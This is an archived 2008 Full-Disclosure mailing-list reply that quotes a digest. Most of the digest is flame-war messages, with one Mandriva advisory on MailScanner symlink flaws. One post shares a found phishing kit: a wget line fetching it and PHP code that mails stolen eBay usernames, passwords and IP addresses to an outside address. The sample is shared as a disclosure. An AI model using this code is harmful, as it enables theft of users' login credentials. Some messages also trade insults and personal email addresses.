| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 23 Dec 2008 00:23:48 -0500
From: "Dowling, Gabrielle" <gdowling@...skauer.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Full-Disclosure Digest, Vol 46, Issue 43
You know, the discourse on this list singiularly manifests the problems in it security these days.
I have remained subscribed for a couple of years as I thought there was occasaional snippets of useful informatiion, .
There obviously is no reason to continue here.
This list has devolved to an argument between nt whateber and urleet.
I cannot remember something important was broached on this list'.
If security is important, how do we allow it to be so trivialized by the comments on this forum, and how do we get our budgets through in such a harsh econo$y?
--------------------------
Sent from my BlackBerry Wireless Handheld
----- Original Message -----
From: full-disclosure-bounces@...ts.grok.org.uk <full-disclosure-bounces@...ts.grok.org.uk>
To: full-disclosure@...ts.grok.org.uk <full-disclosure@...ts.grok.org.uk>
Sent: Mon Dec 22 18:12:41 2008
Subject: Full-Disclosure Digest, Vol 46, Issue 43
Send Full-Disclosure mailing list submissions to
full-disclosure@...ts.grok.org.uk
To subscribe or unsubscribe via the World Wide Web, visit
https://lists.grok.org.uk/mailman/listinfo/full-disclosure
or, via email, send a message with subject or body 'help' to
full-disclosure-request@...ts.grok.org.uk
You can reach the person managing the list at
full-disclosure-owner@...ts.grok.org.uk
When replying, please edit your Subject line so it is more specific
than "Re: Contents of Full-Disclosure digest..."
Note to digest recipients - when replying to digest posts, please trim your post appropriately. Thank you.
Today's Topics:
1. Re: Microsoft issues out-of-band patch (j-f sentier)
2. Re: Microsoft issues out-of-band patch (n3td3v)
3. Re: Microsoft issues out-of-band patch (Bipin Gautam)
4. Fresh Phish anyone? (Kevin Finisterre (lists))
5. Re: o lookie, n3td3v is lying elsewhere now (Ureleet)
6. Re: Microsoft issues out-of-band patch (Ureleet)
7. Re: Microsoft issues out-of-band patch (Ureleet)
8. Re: Microsoft issues out-of-band patch (Ureleet)
9. Re: Microsoft issues out-of-band patch (Ureleet)
10. Re: o lookie, n3td3v is lying elsewhere now (n3td3v)
11. Re: o lookie, n3td3v is lying elsewhere now (n3td3v)
12. Re: Hotmail easter-egg found using Tamper Data....
(James Matthews)
13. [ MDVA-2008:241 ] mailscanner (security@...driva.com)
14. Re: o lookie, n3td3v is lying elsewhere now (n3td3v)
15. Re: o lookie, n3td3v is lying elsewhere now (Everett Maus)
16. Re: o lookie, n3td3v is lying elsewhere now (waveroad waveroad)
17. Re: o lookie, n3td3v is lying elsewhere now (n3td3v)
18. Re: o lookie, n3td3v is lying elsewhere now (n3td3v)
19. Re: Fresh Phish anyone? (anonymous pimp)
20. Re: Fresh Phish anyone? (Kevin Finisterre (lists))
21. Re: Fresh Phish anyone? (n3td3v)
22. Re: o lookie, n3td3v is lying elsewhere now (j-f sentier)
23. Re: Fresh Phish anyone? (Valdis.Kletnieks@...edu)
24. Re: Fresh Phish anyone? (j-f sentier)
25. This list has run its course (n3td3v)
26. Re: Fresh Phish anyone? (n3td3v)
27. Re: This list has run its course (n3td3v)
28. Barracuda Reputation Block List (Elazar Broad)
----------------------------------------------------------------------
Message: 1
Date: Mon, 22 Dec 2008 12:56:19 -0500
From: "j-f sentier" <j.sentiar@...il.com>
Subject: Re: [Full-disclosure] Microsoft issues out-of-band patch
To: n3td3v <xploitable@...il.com>, full-disclosure@...ts.grok.org.uk
Message-ID:
<6f80feaf0812220956r1de6cb2dnf51c5d82ffa04553@...l.gmail.com>
Content-Type: text/plain; charset="iso-8859-1"
Who will be dumb enough to give a job to a piece of shit like you ?
2008/12/22, n3td3v <xploitable@...il.com>:
>
> Maybe MI5 will tap me on the shoulder and offer me a job. :)
>
>
> On Mon, Dec 22, 2008 at 5:13 PM, Udi Shamir <udishamir@...oo.com> wrote:
> > There is always singing bird but the odds are thin
> >
> > Sent from my iPhone
> >
> > On Dec 22, 2008, at 19:10, n3td3v <xploitable@...il.com> wrote:
> >
> > On Mon, Dec 22, 2008 at 4:44 PM, Michael Krymson <krymson@...il.com>
> wrote:
> > Fact? Now you're really needing to cite some sources or backing,
> otherwise
> > this is, in fact, not fact.
> >
> > Where would I get the source from if its a secret intelligence agency?
> > Find an MI5 spy out of a hat and tell him to come on full-disclosure
> > to back me up?
> >
> > Unlikely to happen, no?
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
> >
> >
> >
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081222/b12de591/attachment-0001.html
------------------------------
Message: 2
Date: Mon, 22 Dec 2008 18:16:43 +0000
From: n3td3v <xploitable@...il.com>
Subject: Re: [Full-disclosure] Microsoft issues out-of-band patch
To: "j-f sentier" <j.sentiar@...il.com>,
full-disclosure@...ts.grok.org.uk
Message-ID:
<4b6ee9310812221016j7771c236v12e2a828d52768b7@...l.gmail.com>
Content-Type: text/plain; charset=ISO-8859-1
MI5
On Mon, Dec 22, 2008 at 5:56 PM, j-f sentier <j.sentiar@...il.com> wrote:
> Who will be dumb enough to give a job to a piece of shit like you ?
>
>
> 2008/12/22, n3td3v <xploitable@...il.com>:
>>
>> Maybe MI5 will tap me on the shoulder and offer me a job. :)
>>
>>
>> On Mon, Dec 22, 2008 at 5:13 PM, Udi Shamir <udishamir@...oo.com> wrote:
>> > There is always singing bird but the odds are thin
>> >
>> > Sent from my iPhone
>> >
>> > On Dec 22, 2008, at 19:10, n3td3v <xploitable@...il.com> wrote:
>> >
>> > On Mon, Dec 22, 2008 at 4:44 PM, Michael Krymson <krymson@...il.com>
>> > wrote:
>> > Fact? Now you're really needing to cite some sources or backing,
>> > otherwise
>> > this is, in fact, not fact.
>> >
>> > Where would I get the source from if its a secret intelligence agency?
>> > Find an MI5 spy out of a hat and tell him to come on full-disclosure
>> > to back me up?
>> >
>> > Unlikely to happen, no?
>> >
>> > _______________________________________________
>> > Full-Disclosure - We believe in it.
>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> > Hosted and sponsored by Secunia - http://secunia.com/
>> >
>> >
>> >
>> >
>> >
>> >
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
------------------------------
Message: 3
Date: Tue, 23 Dec 2008 00:09:31 +0545
From: "Bipin Gautam" <bipin.gautam@...il.com>
Subject: Re: [Full-disclosure] Microsoft issues out-of-band patch
To: "j-f sentier" <j.sentiar@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Message-ID:
<754924960812221024s6dba9446j884886204fd6284e@...l.gmail.com>
Content-Type: text/plain; charset=ISO-8859-1
Stop acting like in adolescence. I am 23, how old are you guys? DONT
YOU GET IT, FD is a "professional forum" for GOD's shake!
------------------------------
Message: 4
Date: Mon, 22 Dec 2008 13:32:50 -0500
From: "Kevin Finisterre (lists)" <kf_lists@...italmunition.com>
Subject: [Full-disclosure] Fresh Phish anyone?
To: Full Disclosure <full-disclosure@...ts.grok.org.uk>
Message-ID: <7E85B3DA-8312-4DE9-AA93-E62157E76EE8@...italmunition.com>
Content-Type: text/plain; charset=US-ASCII; format=flowed; delsp=yes
>
Someone is bored and out making the rounds exploiting random asp pages
and web-services.
wget http://www.adehkz.net/eb.zip
<?php
session_start();
$userid = $_POST['userid'];
$password = $_POST['password'];
$ip = getenv("REMOTE_ADDR");
$subj = "eB - $userid";
$msg = "Username: $userid\nPassword: $password\n....\nIP: $ip";
mail("asdfwr@...il.com", $subj, $msg);
header("Location: https://signin.ebay.com/ws/eBayISAPI.dll?SignIn&errmsg=8&pUserId=&co_partnerId=2&siteid=0&pageType=1883&pa1=&i1=-1&UsingSSL=1&bshowgif=0&favoritenav=&ru=http%3A%2F%2Fmy.ebay.com%2Fws%2FeBayISAPI.dll%3FMyeBay&pp=&migrateVisitor=1
");
?>
I passed this on to the SANS handlers a few days ago but the site is
still up and running.
Enjoy
-KF
------------------------------
Message: 5
Date: Mon, 22 Dec 2008 14:17:09 -0500
From: Ureleet <ureleet@...il.com>
Subject: Re: [Full-disclosure] o lookie, n3td3v is lying elsewhere now
To: n3td3v <xploitable@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Message-ID:
<6158bb410812221117j4201ee6ep2045482de5c99a5@...l.gmail.com>
Content-Type: text/plain; charset=ISO-8859-1
On Mon, Dec 22, 2008 at 8:33 AM, n3td3v <xploitable@...il.com> wrote:
> On Mon, Dec 22, 2008 at 1:26 PM, Ureleet <ureleet@...il.com> wrote:
>> u say u r a badass hacker
>
> When?
>
o, i m sure someone who has more time on their hands could at least
find references where u claim 2 b an eleet hax0r.
this is a favorite of mine tho:
http://forum.crime-research.org/-vp3073.html?sid=172c1ebba153817877ca67d3de837933
------------------------------
Message: 6
Date: Mon, 22 Dec 2008 14:18:31 -0500
From: Ureleet <ureleet@...il.com>
Subject: Re: [Full-disclosure] Microsoft issues out-of-band patch
To: n3td3v <xploitable@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Message-ID:
<6158bb410812221118t247acf7etbb1cf7c996f9fce8@...l.gmail.com>
Content-Type: text/plain; charset=ISO-8859-1
On Mon, Dec 22, 2008 at 12:10 PM, n3td3v <xploitable@...il.com> wrote:
> On Mon, Dec 22, 2008 at 4:44 PM, Michael Krymson <krymson@...il.com> wrote:
>> Fact? Now you're really needing to cite some sources or backing, otherwise
>> this is, in fact, not fact.
>
> Where would I get the source from if its a secret intelligence agency?
> Find an MI5 spy out of a hat and tell him to come on full-disclosure
> to back me up?
>
> Unlikely to happen, no?
>
so u just lied agin? publicaly? while u say things r fact, and they
are in fact not fact? when do we take u srsly? stop lying.
------------------------------
Message: 7
Date: Mon, 22 Dec 2008 14:18:44 -0500
From: Ureleet <ureleet@...il.com>
Subject: Re: [Full-disclosure] Microsoft issues out-of-band patch
To: "Bipin Gautam" <bipin.gautam@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Message-ID:
<6158bb410812221118x21acc2f7te314f728bdfb0731@...l.gmail.com>
Content-Type: text/plain; charset=ISO-8859-1
On Mon, Dec 22, 2008 at 1:24 PM, Bipin Gautam <bipin.gautam@...il.com> wrote:
> Stop acting like in adolescence. I am 23, how old are you guys? DONT
> YOU GET IT, FD is a "professional forum" for GOD's shake!
since when?
------------------------------
Message: 8
Date: Mon, 22 Dec 2008 14:19:18 -0500
From: Ureleet <ureleet@...il.com>
Subject: Re: [Full-disclosure] Microsoft issues out-of-band patch
To: n3td3v <xploitable@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Message-ID:
<6158bb410812221119p3eb67698pf9eeef8222191df2@...l.gmail.com>
Content-Type: text/plain; charset=ISO-8859-1
On Mon, Dec 22, 2008 at 1:16 PM, n3td3v <xploitable@...il.com> wrote:
> MI5
>
> On Mon, Dec 22, 2008 at 5:56 PM, j-f sentier <j.sentiar@...il.com> wrote:
>> Who will be dumb enough to give a job to a piece of shit like you ?
so now u say u work for mi5? any1 else read that like i just did?
------------------------------
Message: 9
Date: Mon, 22 Dec 2008 14:19:36 -0500
From: Ureleet <ureleet@...il.com>
Subject: Re: [Full-disclosure] Microsoft issues out-of-band patch
To: n3td3v <xploitable@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Message-ID:
<6158bb410812221119p31394632m4bca0cbb8f771eec@...l.gmail.com>
Content-Type: text/plain; charset=ISO-8859-1
On Mon, Dec 22, 2008 at 12:39 PM, n3td3v <xploitable@...il.com> wrote:
> Maybe MI5 will tap me on the shoulder and offer me a job. :)
>
u wish kid.
------------------------------
Message: 10
Date: Mon, 22 Dec 2008 19:38:10 +0000
From: n3td3v <xploitable@...il.com>
Subject: Re: [Full-disclosure] o lookie, n3td3v is lying elsewhere now
To: Ureleet <ureleet@...il.com>, full-disclosure@...ts.grok.org.uk
Message-ID:
<4b6ee9310812221138l390f4f62x81108af9f835365@...l.gmail.com>
Content-Type: text/plain; charset=ISO-8859-1
On Mon, Dec 22, 2008 at 7:17 PM, Ureleet <ureleet@...il.com> wrote:
> On Mon, Dec 22, 2008 at 8:33 AM, n3td3v <xploitable@...il.com> wrote:
>> On Mon, Dec 22, 2008 at 1:26 PM, Ureleet <ureleet@...il.com> wrote:
>>> u say u r a badass hacker
>>
>> When?
>>
>
> o, i m sure someone who has more time on their hands could at least
> find references where u claim 2 b an eleet hax0r.
>
> this is a favorite of mine tho:
> http://forum.crime-research.org/-vp3073.html?sid=172c1ebba153817877ca67d3de837933
>
If only you knew t34ch_m3_h0w_t0_h4ck is a Yahoo! employee and I was
making fun of it while trying to get intelligence on folks from that
forum.
We used to collect intelligence together and information share about hackers.
You can contact t34ch_m3_h0w_t0_h4ck here: http://metal.hurlant.com/blog/
Or email him here: henri_torgemane@...oo.com
Or his corporate email at henrit@...oo-inc.com if you don't believe me.
I have never told a lie...
------------------------------
Message: 11
Date: Mon, 22 Dec 2008 19:44:53 +0000
From: n3td3v <xploitable@...il.com>
Subject: Re: [Full-disclosure] o lookie, n3td3v is lying elsewhere now
To: "Ben Preston" <benjamin.preston@...il.com>,
full-disclosure@...ts.grok.org.uk
Message-ID:
<4b6ee9310812221144n3884c54ft1acf7886f3ea8628@...l.gmail.com>
Content-Type: text/plain; charset=ISO-8859-1
The group is not for youngsters its for serious intelligencers, any
youngsters who join get banned.
On Mon, Dec 22, 2008 at 7:42 PM, Ben Preston <benjamin.preston@...il.com> wrote:
> No, they subscribed because they were hoping it would be the same
> un-tellectual junkshow that they get to see on FD. You're the only
> one making any noise on it so it turns out to be more like watching a
> mental patient through a one-way mirror. You manage to lure in
> impressionable youngsters and those who lack experience with English
> who have no idea that you're just spewing nonsense. They seem to be
> part of the few who engage in thread conversations in your group,
> however briefly. They catch on pretty quick.
>
> Please stop bloviating about your silly "group". It's not lending you
> any credence.
>
> Warmest regards,
>
> --
>
> Ben
>
------------------------------
Message: 12
Date: Mon, 22 Dec 2008 21:55:17 +0200
From: "James Matthews" <nytrokiss@...il.com>
Subject: Re: [Full-disclosure] Hotmail easter-egg found using Tamper
Data....
To: "Stephen Menard" <smenard@...et.nb.ca>
Cc: full-disclosure@...ts.grok.org.uk
Message-ID:
<8a6b8e350812221155x40f46009ye97414f923adb008@...l.gmail.com>
Content-Type: text/plain; charset="koi8-r"
It's quite cute :) Nice to know someone at microsoft has a lighter side.
On Sun, Dec 21, 2008 at 11:52 PM, Stephen Menard <smenard@...et.nb.ca>wrote:
> Kristo pher wrote:
> > You need to obscure the images you post to FD better my friend. For
> example, I can tell that you are a PhD student at University College London,
> Faculty of Biomedical Sciences, Institute of Neurology Department of Brain
> Repair & Rehabilitation and your alternative email is
> m.machizawa@....ac.uk
> >
> >
> >
> > ????? Mail.Ru ????? ? ??????!
> > http://r.mail.ru/cln4786/agent.mail.ru/ru/
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> what tool[s] allows you to access this [?meta data?] from the posting
> pleass?
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
--
http://www.astorandblack.com/
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081222/ca62e4d3/attachment-0001.html
------------------------------
Message: 13
Date: Mon, 22 Dec 2008 13:07:00 -0700
From: security@...driva.com
Subject: [Full-disclosure] [ MDVA-2008:241 ] mailscanner
To: full-disclosure@...ts.grok.org.uk
Message-ID: <E1LEr3M-0007uT-O6@...an.mandriva.com>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________
Mandriva Linux Security Advisory MDVA-2008:241
http://www.mandriva.com/security/
_______________________________________________________________________
Package : mailscanner
Date : December 22, 2008
Affected: Corporate 4.0
_______________________________________________________________________
Problem Description:
Local users can use symlink attacks throughout a flaw on
trend-autoupdate script of MailScanner by using /tmp/opr.ini.#####
or /tmp/lpt temporary file (CVE-2008-5140).
Local users can use symlink attacks throughout flaws on
clamav-autoupdate, panda-autoupdate and rav-autoupdate scripts of
MailScanner by using ClamAV.update.log, pav.zip and RavBusy.lock
temporary files (CVE-2008-5312).
Local users can use symlink attacks throughout flaws on
kaspersky-wrapper, bitdefender-wrapper, rav-wrapper scripts and
Quarentine.pm, TNEF.pm, SA.pm, WorkArea.pm MailScanner perl modules
by using kavoutput.tmp.27073, log.bdc.27073, report.vir.27073,
MailScanner.ownertest.27073, tnef.27073 and MS.bayes.rebuild.lock
temporary files (CVE-2008-5313).
Further MailScanner had symlink flaws on antivir-autoupdate,
bitdefender-autoupdate, clamav-autoupdate, etrust-autoupdate,
generic-autoupdate, inoculan-autoupdate, kaspersky-autoupdate,
nod32-autoupdate, norman-autoupdate, rav-autoupdate,
sophos-autoupdate, symscanengine-autoupdate, vexira-autoupdate,
f-prot-autoupdate and css-autoupdate scripts under following
temporary vulnerable files: AntiVirBusy.lock, BitDefenderBusy.lock,
ClamAVBusy.lock, eTrustBusy.lock, GenericBusy.lock, InoculanBusy.lock,
KasperskyBusy.lock, Nod32Busy.lock, NormanBusy.lock, RavBusy.lock,
SophosBusy.lock, SymScanEngineBusy.lock, VexiraBusy.lock,
FProtBusy.lock and SYMCScan.lock.
This update provides fix for all symlink flaws described on this
security advisory.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5140
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5312
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5313
_______________________________________________________________________
Updated Packages:
Corporate 4.0:
4e93bc7c48ec8f65122d263237b99ec9 corporate/4.0/i586/mailscanner-4.55.9_1-3.1.20060mlcs4.noarch.rpm
f92acdbed4f63778609726eaa2dc8fd1 corporate/4.0/i586/mailscanner-spamassassin-4.55.9_1-3.1.20060mlcs4.noarch.rpm
35f1b7e0cc1534def4394e7bec95ab48 corporate/4.0/SRPMS/mailscanner-4.55.9_1-3.1.20060mlcs4.src.rpm
Corporate 4.0/X86_64:
4e93bc7c48ec8f65122d263237b99ec9 corporate/4.0/x86_64/mailscanner-4.55.9_1-3.1.20060mlcs4.noarch.rpm
f92acdbed4f63778609726eaa2dc8fd1 corporate/4.0/x86_64/mailscanner-spamassassin-4.55.9_1-3.1.20060mlcs4.noarch.rpm
35f1b7e0cc1534def4394e7bec95ab48 corporate/4.0/SRPMS/mailscanner-4.55.9_1-3.1.20060mlcs4.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iD8DBQFJT8jcmqjQ0CJFipgRArRHAKDH4O/m1AfoakbcAK7monhnYH5eywCg8m1k
OPwl0ksaHvGa9rLs78PtnwQ=
=St+b
-----END PGP SIGNATURE-----
------------------------------
Message: 14
Date: Mon, 22 Dec 2008 20:12:22 +0000
From: n3td3v <xploitable@...il.com>
Subject: Re: [Full-disclosure] o lookie, n3td3v is lying elsewhere now
To: "Everett Maus" <them.root@...il.com>,
full-disclosure@...ts.grok.org.uk
Message-ID:
<4b6ee9310812221212r661ce6c9v184d33bf67d464be@...l.gmail.com>
Content-Type: text/plain; charset=ISO-8859-1
Maybe it's the "n3td3v"?
On Mon, Dec 22, 2008 at 8:07 PM, Everett Maus <them.root@...il.com> wrote:
> Could've fooled me.
>
> n3td3v wrote:
>>
>> The group is not for youngsters its for serious intelligencers, any
>> youngsters who join get banned.
>>
>> On Mon, Dec 22, 2008 at 7:42 PM, Ben Preston <benjamin.preston@...il.com>
>> wrote:
>>
>>>
>>> No, they subscribed because they were hoping it would be the same
>>> un-tellectual junkshow that they get to see on FD. You're the only
>>> one making any noise on it so it turns out to be more like watching a
>>> mental patient through a one-way mirror. You manage to lure in
>>> impressionable youngsters and those who lack experience with English
>>> who have no idea that you're just spewing nonsense. They seem to be
>>> part of the few who engage in thread conversations in your group,
>>> however briefly. They catch on pretty quick.
>>>
>>> Please stop bloviating about your silly "group". It's not lending you
>>> any credence.
>>>
>>> Warmest regards,
>>>
>>> --
>>>
>>> Ben
>>>
>>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>>
>
>
------------------------------
Message: 15
Date: Mon, 22 Dec 2008 15:07:31 -0500
From: Everett Maus <them.root@...il.com>
Subject: Re: [Full-disclosure] o lookie, n3td3v is lying elsewhere now
To: n3td3v <xploitable@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Message-ID: <494FF383.4080907@...il.com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Could've fooled me.
n3td3v wrote:
> The group is not for youngsters its for serious intelligencers, any
> youngsters who join get banned.
>
> On Mon, Dec 22, 2008 at 7:42 PM, Ben Preston <benjamin.preston@...il.com> wrote:
>
>> No, they subscribed because they were hoping it would be the same
>> un-tellectual junkshow that they get to see on FD. You're the only
>> one making any noise on it so it turns out to be more like watching a
>> mental patient through a one-way mirror. You manage to lure in
>> impressionable youngsters and those who lack experience with English
>> who have no idea that you're just spewing nonsense. They seem to be
>> part of the few who engage in thread conversations in your group,
>> however briefly. They catch on pretty quick.
>>
>> Please stop bloviating about your silly "group". It's not lending you
>> any credence.
>>
>> Warmest regards,
>>
>> --
>>
>> Ben
>>
>>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
------------------------------
Message: 16
Date: Mon, 22 Dec 2008 15:15:47 -0500
From: "waveroad waveroad" <waveroad@...il.com>
Subject: Re: [Full-disclosure] o lookie, n3td3v is lying elsewhere now
To: full-disclosure@...ts.grok.org.uk
Message-ID:
<296a304a0812221215y5f4afcb5sb78aa64e16909551@...l.gmail.com>
Content-Type: text/plain; charset="iso-8859-1"
Mine is that one:
http://www.bigblueball.com/forums/search.php?searchid=903472
http://www.bigblueball.com/forums/bigblueball-lounge/27558-n3td3vs-reputation-d.html
etc ..
N3td3v's quote of the day : "Trust me, if you want to be rude, i'll be rude
back to you, and if you keep doing it, i'll make sure this website gets
hacked."
(http://www.bigblueball.com/forums/forum-support/28972-serious-post.html)
It's funny to hear that from a guy who say: "we're letting the bad guys win,
whitehat powaa, i'm serious, MI5 will hire me one day, etc"
2008/12/22 Ureleet <ureleet@...il.com>
> this is a favorite of mine tho:
>
> http://forum.crime-research.org/-vp3073.html?sid=172c1ebba153817877ca67d3de837933
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081222/a71af368/attachment-0001.html
------------------------------
Message: 17
Date: Mon, 22 Dec 2008 20:31:16 +0000
From: n3td3v <xploitable@...il.com>
Subject: Re: [Full-disclosure] o lookie, n3td3v is lying elsewhere now
To: "waveroad waveroad" <waveroad@...il.com>,
full-disclosure@...ts.grok.org.uk
Message-ID:
<4b6ee9310812221231q52f0ff59mf15365962f26e9cd@...l.gmail.com>
Content-Type: text/plain; charset=ISO-8859-1
Looks like you've been joe jobbed, not just the folks on that forum.
On Mon, Dec 22, 2008 at 8:15 PM, waveroad waveroad <waveroad@...il.com> wrote:
> Mine is that one:
> http://www.bigblueball.com/forums/search.php?searchid=903472
> http://www.bigblueball.com/forums/bigblueball-lounge/27558-n3td3vs-reputation-d.html
> etc ..
>
> N3td3v's quote of the day : "Trust me, if you want to be rude, i'll be rude
> back to you, and if you keep doing it, i'll make sure this website gets
> hacked."
> (http://www.bigblueball.com/forums/forum-support/28972-serious-post.html)
>
> It's funny to hear that from a guy who say: "we're letting the bad guys win,
> whitehat powaa, i'm serious, MI5 will hire me one day, etc"
>
> 2008/12/22 Ureleet <ureleet@...il.com>
>>
>> this is a favorite of mine tho:
>>
>> http://forum.crime-research.org/-vp3073.html?sid=172c1ebba153817877ca67d3de837933
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
------------------------------
Message: 18
Date: Mon, 22 Dec 2008 20:57:47 +0000
From: n3td3v <xploitable@...il.com>
Subject: Re: [Full-disclosure] o lookie, n3td3v is lying elsewhere now
To: full-disclosure@...ts.grok.org.uk
Message-ID:
<4b6ee9310812221257l60e23b0brdff04e8eb176bf33@...l.gmail.com>
Content-Type: text/plain; charset=ISO-8859-1
And the folks who are subscribed to "funsec" have been lured in by Gadi Evron.
Look's like the intelligence services have got all their bases covered.
Likewise, you've all been lured into Full-disclosure and Bugtraq, but
what's *really* going on?
Take it easy,
On Mon, Dec 22, 2008 at 8:12 PM, n3td3v <xploitable@...il.com> wrote:
> Maybe it's the "n3td3v"?
>
> On Mon, Dec 22, 2008 at 8:07 PM, Everett Maus <them.root@...il.com> wrote:
>> Could've fooled me.
>>
>> n3td3v wrote:
>>>
>>> The group is not for youngsters its for serious intelligencers, any
>>> youngsters who join get banned.
>>>
>>> On Mon, Dec 22, 2008 at 7:42 PM, Ben Preston <benjamin.preston@...il.com>
>>> wrote:
>>>
>>>>
>>>> No, they subscribed because they were hoping it would be the same
>>>> un-tellectual junkshow that they get to see on FD. You're the only
>>>> one making any noise on it so it turns out to be more like watching a
>>>> mental patient through a one-way mirror. You manage to lure in
>>>> impressionable youngsters and those who lack experience with English
>>>> who have no idea that you're just spewing nonsense. They seem to be
>>>> part of the few who engage in thread conversations in your group,
>>>> however briefly. They catch on pretty quick.
>>>>
>>>> Please stop bloviating about your silly "group". It's not lending you
>>>> any credence.
>>>>
>>>> Warmest regards,
>>>>
>>>> --
>>>>
>>>> Ben
>>>>
>>>>
>>>
>>> _______________________________________________
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>>
>>
>>
>
------------------------------
Message: 19
Date: Mon, 22 Dec 2008 23:24:04 +0200
From: "anonymous pimp" <anonymouspimp@...il.com>
Subject: Re: [Full-disclosure] Fresh Phish anyone?
To: "Kevin Finisterre (lists)" <kf_lists@...italmunition.com>
Cc: Full Disclosure <full-disclosure@...ts.grok.org.uk>
Message-ID:
<2d792fb20812221324q591946deh32e7ec03c3bfe44f@...l.gmail.com>
Content-Type: text/plain; charset=ISO-8859-1
What kind of a skiddie fuck sends every phished account to his email?
This is the kind of phish every 12 year old kid on both sides of
Turkey uses. Is this supposed to make you seem smart?
gtfo of fd.
------------------------------
Message: 20
Date: Mon, 22 Dec 2008 16:30:03 -0500
From: "Kevin Finisterre (lists)" <kf_lists@...italmunition.com>
Subject: Re: [Full-disclosure] Fresh Phish anyone?
To: Full Disclosure <full-disclosure@...ts.grok.org.uk>
Message-ID: <4D08E454-3534-4DB4-B589-161DC976D8AF@...italmunition.com>
Content-Type: text/plain; charset=US-ASCII; format=flowed; delsp=yes
On Dec 22, 2008, at 4:24 PM, anonymous pimp wrote:
> What kind of a skiddie fuck sends every phished account to his email?
Who the hell knows... maybe someone here that was bored is interested
in looking into that.
> This is the kind of phish every 12 year old kid on both sides of
> Turkey uses.
Sweet, is knowing that supposed to make you look like a ninja?
> Is this supposed to make you seem smart?
Yup.... see how s m r t I be
> gtfo of fd.
No problem... I'd been away for some time now. Sorry I bothered
dropping in.
-KF
------------------------------
Message: 21
Date: Mon, 22 Dec 2008 21:53:29 +0000
From: n3td3v <xploitable@...il.com>
Subject: Re: [Full-disclosure] Fresh Phish anyone?
To: kf_lists@...italmunition.com, full-disclosure@...ts.grok.org.uk
Message-ID:
<4b6ee9310812221353u15d9c055sbcf6ecfb533a0603@...l.gmail.com>
Content-Type: text/plain; charset=ISO-8859-1
On Mon, Dec 22, 2008 at 9:30 PM, Kevin Finisterre (lists)
<kf_lists@...italmunition.com> wrote:
>> gtfo of fd.
>
> No problem... I'd been away for some time now. Sorry I bothered
> dropping in.
>
> -KF
Don't worry, they tell me to GTFO of FD as well.
It seems the real researchers aren't welcome here anymore.
:(
------------------------------
Message: 22
Date: Mon, 22 Dec 2008 17:34:06 -0500
From: "j-f sentier" <j.sentiar@...il.com>
Subject: Re: [Full-disclosure] o lookie, n3td3v is lying elsewhere now
